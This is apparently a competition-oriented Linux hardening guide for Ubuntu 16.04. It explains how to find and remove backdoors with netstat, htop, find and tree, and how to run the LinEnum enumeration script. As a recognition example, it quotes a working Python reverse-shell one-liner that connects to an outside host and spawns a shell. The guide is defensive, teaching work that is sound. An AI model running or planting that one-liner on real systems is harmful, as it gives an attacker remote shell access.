Operating Systems/Linux/Ubuntu/Ubuntu 16.04 LTS/Malware-Backdoors

Backdoors

Netstat

Netstat lets you see which ports are being used by which programs. This is valuable because backdoors may be waiting for a remote hacker to connect to it on your computer.

1. Install netstat with sudo apt install net-tools
2. sudo netstat -tlnp to run netstat.
   • sudo is required so that you have the permission to the see which process is using each port
   • -t only shows processes using tcp, which is common for backdoors
   • -l only shows listening processes, which backdoors will most likely be doing
   • -n shows each process's address
   • -p displays the process's name
3. If you find a process you don't recognize (cupsd and sshd are safe), first Google (or DuckDuckGo) the name to see if it seems like a regular linux thing or something related to the scoring software.
4. If it seems potentially dangerous, use a program called htop to inspect it.
   • sudo apt install htop
   • htop
   • press '/' to start searching for a process, and type in the process name you're suspicious of.
   • the command column will tell you where the program or script is located on your computer. This may be useful if a forensics question asks you to locate a backdoor.
   • After any forensics question, try to stop the process if you're confidant that it's a malicious program. leave htop (ctrl-c) and run kill <process>. If you lose point, try to figure out how to start the process again (rebooting might work). If you don't lose points you can remove the program or script from the location found with htop, using sudo rm <program path>

Other Methods

Another way of looking for backdoors is looking for the script itself. There are many ways to do this, but don't count on them to find a well hidden script.

1. A simple and not very effective method is to simple search based on file extension. Scripts are usually written in python or bash, but this isn't a great method because files can use any extension they want. However here's how you could do it for python and bash scripts. the "! -user root" section is there to only include scripts owned by users. This is important because files created by users are also owned by users.
   • sudo find / -name "*.py" ! -user root
   • sudo find / -name "*.sh" ! -user root
2. A method to find more hidden backdoors is to search the entire computer for files owned by a certain user (which means that it was created by that user), and exclude directories that normally have files owned by regular users to narrow down the possibilities. The following command uses the find command to find files owned by a certain user, it uses grep -v to exclude paths which including a certain directory, and uses "2> /dev/null" to suppress error messages. Replace both occurrences of <user> with a user on your system. You'll most likely want to automate this by getting a list of every user on the system, and using this command on each of their names. The reason that this command doesn't just search for files not owned by root like the first command does is because that wouldn't narrow it down enough.
   • sudo find / -user <user> 2> /dev/null | grep -v "/home/" | grep -v "/tmp/" | grep -v "/proc/" | grep -v "/opt/engine" | grep -v "/sys/fs/fuse/connections" | grep -v "/dev/" | grep -v $(id -u <user>)
3. The second method is pretty comprehensive, besides the home directory, which it excludes because almost every file in the home directory is owned by regular users. A good way to skim through the entire home directory is by using the tree command. It gives a visual representation, which allows you to easily skip past sections that you don't think backdoors will be in, like in Firefox's files.
   • sudo apt install tree
   • sudo tree /home

Inspect a Possible Backdoor

In case you do find a file that you suspect of being a backdoor, inspect its code using cat <file>. ChatGPT can usually tell you what a script does, and whether it's a backdoor. In case you want to figure it out yourself, here's an example of a python backdoor found on an image: import sys,socket,os,pty; s=socket.socket(); s.connect(('eth007.me',42023)); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('sh') (it may or may not be compressed into one line like this one was). It's not important to understand exactly what it does, but notice that it's connecting to another IP address (which eth007.me represents), and that it spawns a shell, "sh" in this case but it could be "bash" instead. A forensics question might ask you for the IP address of the attacker. In this case the IP address wasn't stored plainly in the backdoor, instead the domain name was used, but the command nslookup <domain> prints out two adresses that it got in different ways. Try both.

Exploits

LinEnum

LinEnum is a useful program that collects a ton of information about a system that may be useful to hackers or cybersecurity people.

1. Installation:
   • sudo apt install git
   • git clone https://github.com/rebootuser/LinEnum
2. Run it:
   • bash LinEnum/LinEnum.sh
3. It will spit out a ton of information on things that may be useful to you. It's recommended that you scroll through the whole thing yourself, but here are some especially important sections, in order from most to least important:
   • Can we read/write sensitive files: This shows the permissions of important files, such as ones that store passwords. In general they should have -rw-r--r-- permissions, except for /etc/shadow which should have -rw-r----- permissions. If they have different permissions, use sudo chmod 644 <file> (replace 644 with 640 if changing the /etc/shadow file)
   • Password and storage information: This displays how often passwords must change, the encryption method, and more. This should be changed with a script.
   • Path information: This shows the PATH environment variable, which determines which directory the commands you run come from. This should only include bin directories, like /usr/bin.
   • The USER/GROUP section is technically very useful, but those exploits should be fixed with a user script.